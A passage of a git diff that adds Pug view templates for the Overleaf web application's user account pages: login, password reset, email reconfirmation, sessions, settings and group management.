../layout-marketing +include ../_mixins/back_to_btns + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .col-md-10.col-md-offset-1.col-lg-8.col-lg-offset-2 + .card + .page-header + h1 #{translate("newsletter_info_title")} + + p #{translate("newsletter_info_summary")} + + - var submitAction + if subscribed + - submitAction = '/user/newsletter/unsubscribe' + p !{translate("newsletter_info_subscribed", {}, ['strong'])} + else + - submitAction = '/user/newsletter/subscribe' + p !{translate("newsletter_info_unsubscribed", {}, ['strong'])} + + form( + data-ol-async-form + data-ol-reload-on-success + name="newsletterForm" + action=submitAction + method="POST" + ) + input(name='_csrf', type='hidden', value=csrfToken) + +formMessages() + p.actions.text-center + if subscribed + button.btn-danger.btn(type='submit', data-ol-disabled-inflight) + span(data-ol-inflight="idle") #{translate("unsubscribe")} + span(hidden data-ol-inflight="pending") #{translate("saving")}… + else + button.btn-primary.btn(type='submit', data-ol-disabled-inflight) + span(data-ol-inflight="idle") #{translate("subscribe")} + span(hidden data-ol-inflight="pending") #{translate("saving")}… + + if subscribed + p #{translate("newsletter_info_note")} + + .page-separator + +back-to-btns() diff --git a/services/web/app/views/user/login.pug b/services/web/app/views/user/login.pug new file mode 100644 index 0000000..9185b0b --- /dev/null +++ b/services/web/app/views/user/login.pug @@ -0,0 +1,52 @@ +extends ../layout-marketing + +block vars + - 
bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .col-md-6.col-md-offset-3.col-lg-4.col-lg-offset-4 + .card + .page-header + if login_support_title + h1 !{login_support_title} + else + h1 #{translate("log_in")} + form(data-ol-async-form, name="loginForm", action='/login', method="POST") + input(name='_csrf', type='hidden', value=csrfToken) + +formMessages() + +customFormMessage('invalid-password-retry-or-reset', 'danger') + | !{translate('email_or_password_wrong_try_again_or_reset', {}, [{ name: 'a', attrs: { href: '/user/password/reset', 'aria-describedby': 'resetPasswordDescription' } }])} + span.sr-only(id='resetPasswordDescription') + | #{translate('reset_password_link')} + +customValidationMessage('password-compromised') + | !{translate('password_compromised_try_again_or_use_known_device_or_reset', {}, [{name: 'a', attrs: {href: 'https://haveibeenpwned.com/passwords', rel: 'noopener noreferrer', target: '_blank'}}, {name: 'a', attrs: {href: '/user/password/reset', target: '_blank'}}])}. + .form-group + input.form-control( + type='email', + name='email', + required, + placeholder='email@example.com', + autofocus="true" + ) + .form-group + input.form-control( + type='password', + name='password', + required, + placeholder='********', + ) + .actions + button.btn-primary.btn( + type='submit', + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate("login")} + span(hidden data-ol-inflight="pending") #{translate("logging_in")}… + a.pull-right(href='/user/password/reset') #{translate("forgot_your_password")}? + if login_support_text + hr + p.text-center !{login_support_text} + diff --git a/services/web/app/views/user/one_time_login.pug b/services/web/app/views/user/one_time_login.pug new file mode 100644 index 0000000..89e1491 --- /dev/null +++ b/services/web/app/views/user/one_time_login.pug @@ -0,0 +1,20 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .col-md-6.col-md-offset-3.col-lg-4.col-lg-offset-4 + .card + .page-header + h1 We're back! + p Overleaf is now running normally. + p + | Please + | + a(href="/login") log in + | + | to continue working on your projects. diff --git a/services/web/app/views/user/passwordReset-bs5.pug b/services/web/app/views/user/passwordReset-bs5.pug new file mode 100644 index 0000000..7637a91 --- /dev/null +++ b/services/web/app/views/user/passwordReset-bs5.pug @@ -0,0 +1,76 @@ +extends ../layout-website-redesign-bootstrap-5 +include ../_mixins/recaptcha +include ../_mixins/notification + +block vars + - var suppressNavbar = true + - var suppressFooter = true + +block content + - var showCaptcha = settings.recaptcha && settings.recaptcha.siteKey && !(settings.recaptcha.disabled && settings.recaptcha.disabled.passwordReset) + + if showCaptcha + script(type="text/javascript", nonce=scriptNonce, src="https://www.recaptcha.net/recaptcha/api.js?render=explicit") + div( + id="recaptcha" + class="g-recaptcha" + data-sitekey=settings.recaptcha.siteKey + data-size="invisible" + data-badge="inline" + ) + + main#main-content(data-ol-captcha-retry-trigger-area="") + a.auth-aux-logo(href="/") + img(src=buildImgPath("ol-brand/overleaf-o-dark.svg") alt=settings.appName) + .auth-aux-container + form( + data-ol-async-form + name="passwordResetForm" + action="/user/password/reset" + method="POST" + captcha=(showCaptcha ? '' : false) + captcha-action-name=(showCaptcha ? 
"passwordReset" : false) + ) + if error === 'password_reset_token_expired' + h1.h3.mb-3.mt-0 #{translate("sorry_your_token_expired")} + p #{translate('please_request_a_new_password_reset_email_and_follow_the_link')}. + else + h1.h3.mb-3.mt-0(data-ol-not-sent) #{translate("password_reset_sentence_case")} + h1.h3.mb-3.mt-0(hidden data-ol-sent) #{translate("check_your_email")} + p.mb-3.pb-3(data-ol-not-sent) #{translate("enter_your_email_address_below_and_we_will_send_you_a_link_to_reset_your_password")}. + + div(data-ol-not-sent) + +formMessagesNewStyle() + if error && error !== 'password_reset_token_expired' + +notification({ariaLive: 'assertive', type: 'error', className: 'mb-3', content: translate(error)}) + + div(data-ol-custom-form-message="no-password-allowed-due-to-sso" hidden) + +notification({ariaLive: 'polite', type: 'error', className: 'mb-3', content: translate("you_cant_reset_password_due_to_sso", {}, [{name: 'a', attrs: {href: '/sso-login'}}])}) + input(type="hidden" name="_csrf" value=csrfToken) + .form-group.mb-3 + label.form-label(for='email') #{translate("email")} + input.form-control#email( + aria-label="email" + type='email' + name='email' + required + autocomplete="username" + autofocus + ) + .actions + button.btn.btn-primary.w-100.mb-3( + type='submit' + data-ol-disabled-inflight + aria-label=translate('reset_password_sentence_case') + ) + span(data-ol-inflight="idle") + | #{translate("reset_password_sentence_case")} + span(hidden data-ol-inflight="pending") + | #{translate("requesting_password_reset")}… + a.btn.btn-ghost.w-100.mb-3(href="/login") #{translate("back_to_log_in")} + div(hidden data-ol-sent) + p.mb-4 #{translate('password_reset_email_sent')} + a.btn.btn-primary.w-100.mb-3(href="/login") #{translate('back_to_log_in')} + + if showCaptcha + +recaptchaConditions diff --git a/services/web/app/views/user/passwordReset.pug b/services/web/app/views/user/passwordReset.pug new file mode 100644 index 0000000..410e79f --- /dev/null +++ b/services/web/app/views/user/passwordReset.pug @@ -0,0 +1,84 @@ +extends ../layout-marketing +include ../_mixins/recaptcha + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + - var showCaptcha = settings.recaptcha && settings.recaptcha.siteKey && !(settings.recaptcha.disabled && settings.recaptcha.disabled.passwordReset) + + if showCaptcha + script(type="text/javascript", nonce=scriptNonce, src="https://www.recaptcha.net/recaptcha/api.js?render=explicit") + div( + id="recaptcha" + class="g-recaptcha" + data-sitekey=settings.recaptcha.siteKey + data-size="invisible" + data-badge="inline" + ) + + main.content.content-alt#main-content(data-ol-captcha-retry-trigger-area="") + .container-custom-sm.mx-auto + .card + form( + data-ol-async-form + name="passwordResetForm" + action="/user/password/reset", + method="POST", + captcha=(showCaptcha ? '' : false), + captcha-action-name=(showCaptcha ? "passwordReset" : false), + ) + if error === 'password_reset_token_expired' + h3.mt-0.mb-2 #{translate("sorry_your_token_expired")} + p #{translate('please_request_a_new_password_reset_email_and_follow_the_link')}. + else + h3.mt-0.mb-2(data-ol-not-sent) #{translate("password_reset")} + h3.mt-0.mb-2(hidden data-ol-sent) #{translate("check_your_email")} + p(data-ol-not-sent) #{translate("enter_your_email_address_below_and_we_will_send_you_a_link_to_reset_your_password")}. 
+ + div(data-ol-not-sent) + +formMessages() + if error && error !== 'password_reset_token_expired' + div.alert.alert-danger.mb-2( + role="alert" + aria-live="assertive" + ) + | #{translate(error)} + + div(data-ol-custom-form-message="no-password-allowed-due-to-sso" hidden) + .notification.notification-type-error(aria-live="polite" style="margin-bottom: 10px;") + .notification-icon + span.material-symbols.material-symbols-rounded(aria-hidden="true") error + .notification-content-and-cta + .notification-content + p + | !{translate("you_cant_reset_password_due_to_sso", {}, [{name: 'a', attrs: {href: '/sso-login'}}])} + + input(type="hidden", name="_csrf", value=csrfToken) + .form-group.mb-3 + label(for='email') #{translate("email")} + input.form-control#email( + aria-label="email" + type='email', + name='email', + placeholder=translate("enter_your_email_address"), + required, + autocomplete="username", + autofocus + ) + .actions + button.btn.btn-primary.w-100( + type='submit', + data-ol-disabled-inflight, + aria-label=translate('request_password_reset_to_reconfirm') + ) + span(data-ol-inflight="idle") + | #{translate("request_password_reset")} + span(hidden data-ol-inflight="pending") + | #{translate("requesting_password_reset")}… + div(hidden data-ol-sent) + p.mb-4 #{translate('password_reset_email_sent')} + a(href="/login") #{translate('back_to_log_in')} + + if showCaptcha + +recaptchaConditions diff --git a/services/web/app/views/user/primaryEmailCheck-bs5.pug b/services/web/app/views/user/primaryEmailCheck-bs5.pug new file mode 100644 index 0000000..0828c06 --- /dev/null +++ b/services/web/app/views/user/primaryEmailCheck-bs5.pug @@ -0,0 +1,38 @@ +extends ../layout-website-redesign-bootstrap-5 + +block content + main#main-content + .auth-aux-container + img.w-50.d-block(src=buildImgPath("ol-brand/overleaf.svg") alt=settings.appName) + h1.h3.mb-3 #{translate("keep_your_account_safe")} + div(data-ol-multi-submit) + p.small.mb-4 + | !{translate("primary_email_check_question", { email: getUserEmail() }, ["strong"])} + form( + data-ol-async-form + action="/user/emails/primary-email-check" + method="POST" + ) + input(name='_csrf', type='hidden', value=csrfToken) + +formMessagesNewStyle() + + button.btn.btn-primary.w-100.mb-3( + type='submit' + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate("yes_that_is_correct")} + span(hidden data-ol-inflight="pending") #{translate("confirming")}… + + a.btn.btn-secondary.w-100.mb-4( + href="/user/settings#add-email" + data-ol-slow-link + event-tracking="primary-email-check-change-email" + event-tracking-mb="true" + event-tracking-trigger="click" + ) + span(data-ol-inflight="idle") #{translate("no_update_email")} + span(hidden data-ol-inflight="pending") #{translate("redirecting")}… + p.small.mb-2 + | #{translate("keep_your_email_updated")} + p.small + | !{translate("learn_more_about_emails", {}, [{name: 'a', attrs: {href: '/learn/how-to/Keeping_your_account_secure', 'event-tracking': 'primary-email-check-learn-more', 'event-tracking-mb': 'true', 'event-tracking-trigger': 'click' }}])} diff --git a/services/web/app/views/user/primaryEmailCheck.pug b/services/web/app/views/user/primaryEmailCheck.pug new file mode 100644 index 0000000..8a0f1e6 --- /dev/null +++ b/services/web/app/views/user/primaryEmailCheck.pug @@ -0,0 +1,42 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .login-register-container.primary-email-check-container + 
.card.primary-email-check-card + img.primary-email-check-logo(src=buildImgPath("ol-brand/overleaf.svg") alt=settings.appName) + h3.primary-email-check-header #{translate("keep_your_account_safe")} + .login-register-form.primary-email-check-form(data-ol-multi-submit) + p.small + | !{translate("primary_email_check_question", { email: getUserEmail() }, ["strong"])} + form( + data-ol-async-form + action="/user/emails/primary-email-check" + method="POST" + ) + input(name='_csrf', type='hidden', value=csrfToken) + +formMessages() + + button.btn-primary.btn.btn-block.btn-primary-email-check-button.primary-email-confirm-button( + type='submit' + data-ol-disabled-inflight + ) + span(data-ol-inflight="idle") #{translate("yes_that_is_correct")} + span(hidden data-ol-inflight="pending") #{translate("confirming")}… + + a.btn-secondary.btn.btn-block.btn-primary-email-check-button.primary-email-change-button( + href="/user/settings#add-email" + data-ol-slow-link + event-tracking="primary-email-check-change-email" + event-tracking-mb="true" + event-tracking-trigger="click" + ) + span(data-ol-inflight="idle") #{translate("no_update_email")} + span(hidden data-ol-inflight="pending") #{translate("redirecting")}… + p.small + | #{translate("keep_your_email_updated")} + p.small + | !{translate("learn_more_about_emails", {}, [{name: 'a', attrs: {href: '/learn/how-to/Keeping_your_account_secure', 'event-tracking': 'primary-email-check-learn-more', 'event-tracking-mb': 'true', 'event-tracking-trigger': 'click' }}])} diff --git a/services/web/app/views/user/reconfirm-bs5.pug b/services/web/app/views/user/reconfirm-bs5.pug new file mode 100644 index 0000000..8d9d139 --- /dev/null +++ b/services/web/app/views/user/reconfirm-bs5.pug @@ -0,0 +1,69 @@ +extends ../layout-website-redesign-bootstrap-5 +include ../_mixins/recaptcha + +block content + - var email = reconfirm_email ? reconfirm_email : "" + - var showCaptcha = settings.recaptcha && settings.recaptcha.siteKey && !(settings.recaptcha.disabled && settings.recaptcha.disabled.passwordReset) + + if showCaptcha + script(type="text/javascript", nonce=scriptNonce, src="https://www.recaptcha.net/recaptcha/api.js?render=explicit") + div( + id="recaptcha" + class="g-recaptcha" + data-sitekey=settings.recaptcha.siteKey + data-size="invisible" + data-badge="inline" + ) + + main#main-content(data-ol-captcha-retry-trigger-area="") + .container.auth-aux-container(style="max-width: 420px;") + form( + data-ol-async-form + name="reconfirmAccountForm" + action="/user/reconfirm" + method="POST" + aria-label=translate('request_reconfirmation_email') + captcha=(showCaptcha ? '' : false) + captcha-action-name=(showCaptcha ? "passwordReset" : false) + ) + h1.h5.mb-3 #{translate("reconfirm_account")} + p #{translate('reconfirm_explained')} + | + a(href=`mailto:${settings.adminEmail}`) #{settings.adminEmail} + | . 
+ + div(data-ol-not-sent) + +formMessagesNewStyle() + + input(type="hidden" name="_csrf" value=csrfToken) + .form-group.mb-3 + label.form-label(for='email') #{translate("please_enter_email")} + input.form-control( + aria-label="email" + type='email' + name='email' + placeholder='email@example.com' + required + autofocus + value=email + ) + .actions + button.btn.btn-primary.w-100( + style="white-space: normal;" + type='submit' + data-ol-disabled-inflight + aria-label=translate('request_password_reset_to_reconfirm') + ) + span(data-ol-inflight="idle") + | #{translate('request_password_reset_to_reconfirm')} + span(hidden data-ol-inflight="pending") + | #{translate('request_password_reset_to_reconfirm')}… + div(hidden data-ol-sent) + div.alert.alert-success( + role="alert" + aria-live="polite" + ) + span #{translate('password_reset_email_sent')} + + if showCaptcha + +recaptchaConditions diff --git a/services/web/app/views/user/reconfirm.pug b/services/web/app/views/user/reconfirm.pug new file mode 100644 index 0000000..5db1d81 --- /dev/null +++ b/services/web/app/views/user/reconfirm.pug @@ -0,0 +1,73 @@ +extends ../layout-marketing +include ../_mixins/recaptcha + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + - var email = reconfirm_email ? reconfirm_email : "" + - var showCaptcha = settings.recaptcha && settings.recaptcha.siteKey && !(settings.recaptcha.disabled && settings.recaptcha.disabled.passwordReset) + + if showCaptcha + script(type="text/javascript", nonce=scriptNonce, src="https://www.recaptcha.net/recaptcha/api.js?render=explicit") + div( + id="recaptcha" + class="g-recaptcha" + data-sitekey=settings.recaptcha.siteKey + data-size="invisible" + data-badge="inline" + ) + + main.content.content-alt#main-content(data-ol-captcha-retry-trigger-area="") + .container + .row + .col-sm-12.col-md-6.col-md-offset-3 + .card + h1.card-header.text-capitalize #{translate("reconfirm")} #{translate("Account")} + p #{translate('reconfirm_explained')}  + a(href=`mailto:${settings.adminEmail}`) #{settings.adminEmail} + | . + form( + data-ol-async-form + name="reconfirmAccountForm" + action="/user/reconfirm", + method="POST", + aria-label=translate('request_reconfirmation_email') + captcha=(showCaptcha ? '' : false), + captcha-action-name=(showCaptcha ? 
"passwordReset" : false) + ) + div(data-ol-not-sent) + +formMessages() + + input(type="hidden", name="_csrf", value=csrfToken) + .form-group + label(for='email') #{translate("please_enter_email")} + input.form-control( + aria-label="email" + type='email', + name='email', + placeholder='email@example.com', + required, + autofocus + value=email + ) + .actions + button.btn.btn-primary( + type='submit', + data-ol-disabled-inflight, + aria-label=translate('request_password_reset_to_reconfirm') + ) + span(data-ol-inflight="idle") + | #{translate('request_password_reset_to_reconfirm')} + span(hidden data-ol-inflight="pending") + | #{translate('request_password_reset_to_reconfirm')}… + div(hidden data-ol-sent) + div.alert.alert-success( + role="alert" + aria-live="polite" + ) + span #{translate('password_reset_email_sent')} + .row + .col-sm-12.col-md-6.col-md-offset-3 + if showCaptcha + +recaptchaConditions diff --git a/services/web/app/views/user/register.pug b/services/web/app/views/user/register.pug new file mode 100644 index 0000000..c35f3c0 --- /dev/null +++ b/services/web/app/views/user/register.pug @@ -0,0 +1,35 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .registration_message + if sharedProjectData.user_first_name !== undefined + h1 #{translate("user_wants_you_to_see_project", {username:sharedProjectData.user_first_name, projectname:""})} + em #{sharedProjectData.project_name} + div + | #{translate("join_sl_to_view_project")}. + div + | #{translate("already_have_sl_account")} + a(href="/login") #{translate("login_here")} + else if newTemplateData.templateName !== undefined + h1 #{translate("register_to_edit_template", {templateName:newTemplateData.templateName})} + + div #{translate("already_have_sl_account")} + a(href="/login") #{translate("login_here")} + + .row + .col-md-8.col-md-offset-2.col-lg-6.col-lg-offset-3 + .card + .page-header + h1 #{translate("register")} + p + | Please contact + | + strong #{settings.adminEmail} + | + | to create an account. 
diff --git a/services/web/app/views/user/restricted.pug b/services/web/app/views/user/restricted.pug new file mode 100644 index 0000000..949bd9b --- /dev/null +++ b/services/web/app/views/user/restricted.pug @@ -0,0 +1,16 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content#main-content + .container + .row + .col-md-8.col-md-offset-2.text-center + .page-header + h2 #{translate("restricted_no_permission")} + p + a(href="/") + i.fa.fa-arrow-circle-o-left(aria-hidden="true") + | #{translate("take_me_home")} diff --git a/services/web/app/views/user/sessions.pug b/services/web/app/views/user/sessions.pug new file mode 100644 index 0000000..99905a9 --- /dev/null +++ b/services/web/app/views/user/sessions.pug @@ -0,0 +1,72 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container + .row + .col-md-10.col-md-offset-1.col-lg-8.col-lg-offset-2 + .card.clear-user-sessions + .page-header + h1 #{translate("your_sessions")} + + if currentSession.ip_address && currentSession.session_created + h3 #{translate("current_session")} + div + table.table.table-striped + thead + tr + th #{translate("ip_address")} + th #{translate("session_created_at")} + tr + td #{currentSession.ip_address} + td #{moment(currentSession.session_created).utc().format('Do MMM YYYY, h:mm a')} UTC + + h3 #{translate("other_sessions")} + div + p.small + | !{translate("clear_sessions_description")} + + form( + data-ol-async-form + action='/user/sessions/clear' + method='POST' + ) + input(name='_csrf' type='hidden' value=csrfToken) + div(data-ol-not-sent) + if sessions.length == 0 + p.text-center + | #{translate("no_other_sessions")} + + if sessions.length > 0 + table.table.table-striped + thead + tr + th #{translate("ip_address")} + th #{translate("session_created_at")} + for session in sessions + tr + td #{session.ip_address} + td #{moment(session.session_created).utc().format('Do MMM YYYY, h:mm a')} UTC + + p.actions + .text-center + button.btn.btn-lg.btn-primary( + type="submit" + data-ol-disable-inflight + ) + span(data-ol-inflight="idle") #{translate('clear_sessions')} + span(hidden data-ol-inflight="pending") #{translate("processing")}… + + div(hidden data-ol-sent) + p.text-center + | #{translate("no_other_sessions")} + + p.text-success.text-center + | #{translate('clear_sessions_success')} + .page-separator + a.btn.btn-secondary.text-capitalize(href='/user/settings') #{translate('back_to_account_settings')} + | + a.btn.btn-secondary.text-capitalize(href='/project') #{translate('back_to_your_projects')} diff --git a/services/web/app/views/user/setPassword-bs5.pug b/services/web/app/views/user/setPassword-bs5.pug new file mode 100644 index 0000000..007ae5e --- /dev/null +++ b/services/web/app/views/user/setPassword-bs5.pug @@ -0,0 +1,90 @@ +extends ../layout-website-redesign-bootstrap-5 + +block vars + - var suppressNavbar = true + - var suppressFooter = true + +block content + main#main-content + a.auth-aux-logo(href="/") + img(src=buildImgPath("ol-brand/overleaf-o-dark.svg") alt=settings.appName) + .auth-aux-container + form( + data-ol-async-form + name="passwordResetForm" + action="/user/password/set" + method="POST" + data-ol-hide-on-error="token-expired" + ) + div( + hidden + data-ol-sent + ) + h1.h3.mb-3.mt-0 #{translate("password_updated")} + p.mb-4 #{translate("your_password_has_been_successfully_changed")}. 
+ a.btn.btn-primary.w-100(href='/login') #{translate("log_in_now")} + + div(data-ol-not-sent) + h1.h3.mb-3.mt-0 #{translate("reset_your_password")} + p(data-ol-hide-on-error-message="token-expired") #{translate("create_a_new_password_for_your_account")}. + +formMessagesNewStyle() + + +customFormMessageNewStyle('password-contains-email', 'danger') + | #{translate('invalid_password_contains_email')}. + | #{translate('use_a_different_password')}. + + +customFormMessageNewStyle('password-too-similar', 'danger') + | #{translate('invalid_password_too_similar')}. + | #{translate('use_a_different_password')}. + + +customFormMessageNewStyle('token-expired', 'danger') + | #{translate('password_reset_token_expired')} + br + a(href="/user/password/reset") + | #{translate('request_new_password_reset_email')} + + input(type="hidden" name="_csrf" value=csrfToken) + input(type="text" hidden name="email" autocomplete="username" value=email) + + .form-group.mb-3 + label.form-label(for='passwordField', data-ol-hide-on-error-message="token-expired") #{translate("new_password")} + input.form-control.auth-aux-new-password#passwordField( + type='password' + name='password' + autocomplete="new-password" + autofocus + required + minlength=settings.passwordStrengthOptions.length.min + ) + + +customValidationMessageNewStyle('invalid-password') + | #{translate('invalid_password')}. + + +customValidationMessageNewStyle('password-must-be-different') + | #{translate('password_cant_be_the_same_as_current_one')}. + + +customValidationMessageNewStyle('password-must-be-strong') + | !{translate('password_was_detected_on_a_public_list_of_known_compromised_passwords', {}, [{name: 'a', attrs: {href: 'https://haveibeenpwned.com/passwords', rel: 'noopener noreferrer', target: '_blank'}}])}. + | #{translate('use_a_different_password')}. + + input( + type="hidden" + name="passwordResetToken" + value=passwordResetToken + ) + div(data-ol-hide-on-error-message="token-expired") + div #{translate('in_order_to_have_a_secure_account_make_sure_your_password')} + ul.mb-3.ps-4 + li #{translate('is_longer_than_n_characters', {n: settings.passwordStrengthOptions.length.min})} + li #{translate('does_not_contain_or_significantly_match_your_email')} + li #{translate('is_not_used_on_any_other_website')} + .actions + button.btn.btn-primary.w-100( + type='submit' + data-ol-disabled-inflight + aria-label=translate('set_new_password') + ) + span(data-ol-inflight="idle") + | #{translate('set_new_password')} + span(hidden data-ol-inflight="pending") + | #{translate('set_new_password')}… diff --git a/services/web/app/views/user/setPassword.pug b/services/web/app/views/user/setPassword.pug new file mode 100644 index 0000000..5da2b6b --- /dev/null +++ b/services/web/app/views/user/setPassword.pug @@ -0,0 +1,89 @@ +extends ../layout-marketing + +block vars + - bootstrap5PageStatus = 'disabled' + +block content + main.content.content-alt#main-content + .container-custom-sm.mx-auto + .card + form( + data-ol-async-form, + name="passwordResetForm", + action="/user/password/set", + method="POST", + data-ol-hide-on-error="token-expired" + ) + div( + hidden + data-ol-sent + ) + h3.mt-0.mb-2 #{translate("password_updated")} + p.mb-4 #{translate("your_password_has_been_successfully_changed")}. + a(href='/login') #{translate("log_in_now")} + + div(data-ol-not-sent) + h3.mt-0.mb-2 #{translate("reset_your_password")} + p(data-ol-hide-on-error-message="token-expired") #{translate("create_a_new_password_for_your_account")}. 
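The setPassword templates list three password rules and enforce the minimum length client-side via `minlength=settings.passwordStrengthOptions.length.min`; the remaining rules are validated server-side, which is what the `customValidationMessage` hooks in these files report. A rough TypeScript pre-check for the first two rules might look like this (the function name and messages are illustrative assumptions; the compromised-password rule can only be verified server-side):

    interface PasswordStrengthOptions {
      length: { min: number }
    }

    // Sketch: mirror the first two advertised rules before submission.
    function precheckPassword(
      password: string,
      email: string,
      options: PasswordStrengthOptions
    ): string | null {
      if (password.length < options.length.min) {
        return `must be at least ${options.length.min} characters`
      }
      // "does not contain or significantly match your email": a simple
      // containment test on the local part; the real similarity check is
      // stricter and runs on the server.
      const localPart = email.split('@')[0].toLowerCase()
      if (localPart && password.toLowerCase().includes(localPart)) {
        return 'must not contain or significantly match your email'
      }
      // "is not used on any other website" requires a server-side check
      // against known-compromised password lists.
      return null
    }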
+ +formMessages() + + +customFormMessage('password-contains-email', 'danger') + | #{translate('invalid_password_contains_email')}. + | #{translate('use_a_different_password')}. + + +customFormMessage('password-too-similar', 'danger') + | #{translate('invalid_password_too_similar')}. + | #{translate('use_a_different_password')}. + + +customFormMessage('token-expired', 'danger') + | #{translate('password_reset_token_expired')} + br + a(href="/user/password/reset") + | #{translate('request_new_password_reset_email')} + + input(type="hidden", name="_csrf", value=csrfToken) + input(type="text" hidden name="email" autocomplete="username" value=email) + + .form-group + label(for='passwordField', data-ol-hide-on-error-message="token-expired") #{translate("new_password")} + input.form-control#passwordField( + type='password', + name='password', + placeholder=translate("enter_your_new_password"), + autocomplete="new-password", + autofocus, + required, + minlength=settings.passwordStrengthOptions.length.min + ) + + +customValidationMessage('invalid-password') + | #{translate('invalid_password')}. + + +customValidationMessage('password-must-be-different') + | #{translate('password_cant_be_the_same_as_current_one')}. + + +customValidationMessage('password-must-be-strong') + | !{translate('password_was_detected_on_a_public_list_of_known_compromised_passwords', {}, [{name: 'a', attrs: {href: 'https://haveibeenpwned.com/passwords', rel: 'noopener noreferrer', target: '_blank'}}])}. + | #{translate('use_a_different_password')}. + + input( + type="hidden", + name="passwordResetToken", + value=passwordResetToken + ) + div(data-ol-hide-on-error-message="token-expired") + div #{translate('in_order_to_have_a_secure_account_make_sure_your_password')} + ul.mb-4.ps-4 + li #{translate('is_longer_than_n_characters', {n: settings.passwordStrengthOptions.length.min})} + li #{translate('does_not_contain_or_significantly_match_your_email')} + li #{translate('is_not_used_on_any_other_website')} + .actions + button.btn.btn-primary.w-100( + type='submit', + data-ol-disabled-inflight + aria-label=translate('set_new_password') + ) + span(data-ol-inflight="idle") + | #{translate('set_new_password')} + span(hidden data-ol-inflight="pending") + | #{translate('set_new_password')}… diff --git a/services/web/app/views/user/settings.pug b/services/web/app/views/user/settings.pug new file mode 100644 index 0000000..4f939a4 --- /dev/null +++ b/services/web/app/views/user/settings.pug @@ -0,0 +1,38 @@ +extends ../layout-react + +block entrypointVar + - entrypoint = 'pages/user/settings' + +block vars + - isWebsiteRedesign = true + +block append meta + meta(name="ol-hasPassword" data-type="boolean" content=hasPassword) + meta(name="ol-shouldAllowEditingDetails" data-type="boolean" content=shouldAllowEditingDetails) + meta(name="ol-oauthProviders", data-type="json", content=oauthProviders) + meta(name="ol-institutionLinked", data-type="json", content=institutionLinked) + meta(name="ol-samlError", data-type="json", content=samlError) + meta(name="ol-institutionEmailNonCanonical", content=institutionEmailNonCanonical) + + meta(name="ol-reconfirmedViaSAML", content=reconfirmedViaSAML) + meta(name="ol-reconfirmationRemoveEmail", content=reconfirmationRemoveEmail) + meta(name="ol-samlBeta", content=samlBeta) + meta(name="ol-ssoErrorMessage", content=ssoErrorMessage) + meta(name="ol-thirdPartyIds", data-type="json", content=thirdPartyIds || {}) + meta(name="ol-passwordStrengthOptions", data-type="json", 
content=settings.passwordStrengthOptions || {}) + meta(name="ol-isExternalAuthenticationSystemUsed" data-type="boolean" content=externalAuthenticationSystemUsed()) + meta(name="ol-user" data-type="json" content=user) + meta(name="ol-labsExperiments" data-type="json" content=labsExperiments) + meta(name="ol-dropbox" data-type="json" content=dropbox) + meta(name="ol-github" data-type="json" content=github) + meta(name="ol-projectSyncSuccessMessage", content=projectSyncSuccessMessage) + meta(name="ol-personalAccessTokens", data-type="json" content=personalAccessTokens) + meta(name="ol-emailAddressLimit", data-type="json", content=emailAddressLimit) + meta(name="ol-currentManagedUserAdminEmail" data-type="string" content=currentManagedUserAdminEmail) + meta(name="ol-gitBridgeEnabled" data-type="boolean" content=gitBridgeEnabled) + meta(name="ol-isSaas" data-type="boolean" content=isSaas) + meta(name="ol-memberOfSSOEnabledGroups" data-type="json" content=memberOfSSOEnabledGroups) + +block content + main.content.content-alt#main-content + #settings-page-root diff --git a/services/web/app/views/user_membership/group-managers-react.pug b/services/web/app/views/user_membership/group-managers-react.pug new file mode 100644 index 0000000..f4d8c0e --- /dev/null +++ b/services/web/app/views/user_membership/group-managers-react.pug @@ -0,0 +1,12 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/group-managers' + +block append meta + meta(name="ol-users", data-type="json", content=users) + meta(name="ol-groupId", data-type="string", content=groupId) + meta(name="ol-groupName", data-type="string", content=name) + +block content + main.content.content-alt#subscription-manage-group-root diff --git a/services/web/app/views/user_membership/group-members-react.pug b/services/web/app/views/user_membership/group-members-react.pug new file mode 100644 index 0000000..314a332 --- /dev/null +++ b/services/web/app/views/user_membership/group-members-react.pug @@ -0,0 +1,17 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/group-members' + +block append meta + meta(name="ol-users", data-type="json", content=users) + meta(name="ol-groupId", data-type="string", content=groupId) + meta(name="ol-groupName", data-type="string", content=name) + meta(name="ol-groupSize", data-type="json", content=groupSize) + meta(name="ol-managedUsersActive", data-type="boolean", content=managedUsersActive) + meta(name="ol-groupSSOActive", data-type="boolean", content=groupSSOActive) + meta(name="ol-canUseFlexibleLicensing", data-type="boolean", content=canUseFlexibleLicensing) + meta(name="ol-canUseAddSeatsFeature", data-type="boolean", content=canUseAddSeatsFeature) + +block content + main.content.content-alt#subscription-manage-group-root diff --git a/services/web/app/views/user_membership/institution-managers-react.pug b/services/web/app/views/user_membership/institution-managers-react.pug new file mode 100644 index 0000000..690e840 --- /dev/null +++ b/services/web/app/views/user_membership/institution-managers-react.pug @@ -0,0 +1,12 @@ +extends ../layout-marketing + +block entrypointVar + - entrypoint = 'pages/user/subscription/group-management/institution-managers' + +block append meta + meta(name="ol-users", data-type="json", content=users) + meta(name="ol-groupId", data-type="string", content=groupId) + meta(name="ol-groupName", data-type="string", content=name) + +block content + 
